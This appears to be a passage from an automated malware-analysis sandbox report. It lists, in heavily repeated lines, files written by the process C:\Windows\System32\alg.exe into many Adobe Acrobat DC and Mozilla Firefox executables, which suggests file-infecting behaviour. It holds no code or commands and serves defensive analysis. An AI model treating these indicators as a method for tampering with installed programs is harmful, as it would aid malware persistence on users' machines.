                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
